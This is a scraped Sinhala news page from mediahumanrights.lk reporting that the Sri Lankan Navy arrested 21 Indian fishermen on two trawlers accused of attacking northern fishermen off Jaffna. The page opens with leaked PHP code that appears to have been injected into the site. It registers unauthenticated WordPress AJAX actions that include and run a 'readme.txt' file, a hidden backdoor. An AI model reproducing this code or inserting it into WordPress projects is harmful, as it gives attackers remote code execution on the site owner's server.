if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } උතුරු ධීවරයින්ට පහරදුන් ඉන්දීය ධීවරයින් 21 ක් සමග ට්‍රෝලර් යාත්‍රා අත්අඩංගුවට… - mediahumanrights.lk
mediahumanrights.lk
Local News News

උතුරු ධීවරයින්ට පහරදුන් ඉන්දීය ධීවරයින් 21 ක් සමග ට්‍රෝලර් යාත්‍රා අත්අඩංගුවට…

යාපනය වඩමාරච්චි නැගෙනහිර සක්කොට්ටෙයි මුහුදු තීරයේදී උතුරු ධීවරයින්ට පහරදී දැල් ආම්පන්න විනශා කොට පාල ගිය ඉන්දීය ට්‍රෝලර් යාත්‍රා දෙකකට අයත් ධීවරයින් 21 දෙනෙකු අත්අඩංගුවට ගත් බවට නාවික හමුදාව පවසයි.

අදාල ඉන්දීය ධීවරයින්ගේ යාත්‍රා උතුරු ධීවරයින් විසින් වටකොට ඒ පිළිබඳව උතුරු නාවික විධානයට දැනුම් දී ඇති අතර පසුව උතුරු ධීවරයින්ගේ යාත්‍රාවන්ට පහරදී පලායාමට උත්සහ ගත් ඉන්දීය ධීවරයින්ගේ ට්‍රෝලර් යාත්‍රාවන් පසුපස නාවික හමුදාව ලුහුබැඳ ගොස් ට්‍රොලර් යාත්‍රා දෙකක් නාවික හමුදා භාරයට ගනු ලැබීය.

පසුගිය දින කිහිපය පුරාම උතුරු මුහුදු තීරයේදී ඉන්දීය ධීවරයින් විසින් උතුරු ධීවරයි්ගේ ධීවර යාත්‍රාවලට හානි කිරීම සහ දැල් ආම්පන්න විශාල ප්‍රමාණයක් විනාශ කිරීමට විරෝධය පාමින් විරෝධථා රැසක් සංවිධානය කොට තිබූණි.

මේ අතර අත්අඩංගුවට පත් ඉන්ධීය ධීවරයින් 21 දෙනා කන්කසන්තුරෙයි නාවික හමුදා කඳවුරට රැගෙන ඒමෙන් පසුව වැඩිදුර පරික්ෂණ කටයුතු සඳහා ධීවර හා ජලජසම්පත් දෙපාර්තමේන්තු නිලධාරීන්ට භාරදීමට නාවික හමුදාව පියවර ගනු ලැබීය.

– වන්නි රොමේෂ් මධුෂංඛ

Related posts

ඩොලරය හමුවේ බාල්දුව ලෝකයේ අවදානම්ම රටවල් 07 අතරට ශ‍්‍රී ලංකාවත්

Shiran Viraj

සහල් මිල තවත් ඉහල දමයි.. නාඩු තොග මිල 135යි.. සුදු කැකුළු 125යි..

Shiran Viraj

නොමිලේ දුන්නත් අදත් ක‍්‍රීඩාගාර හිස්.. විචාරයන්ට මල පනී.. සජීවීව බැන වදී..

Shiran Viraj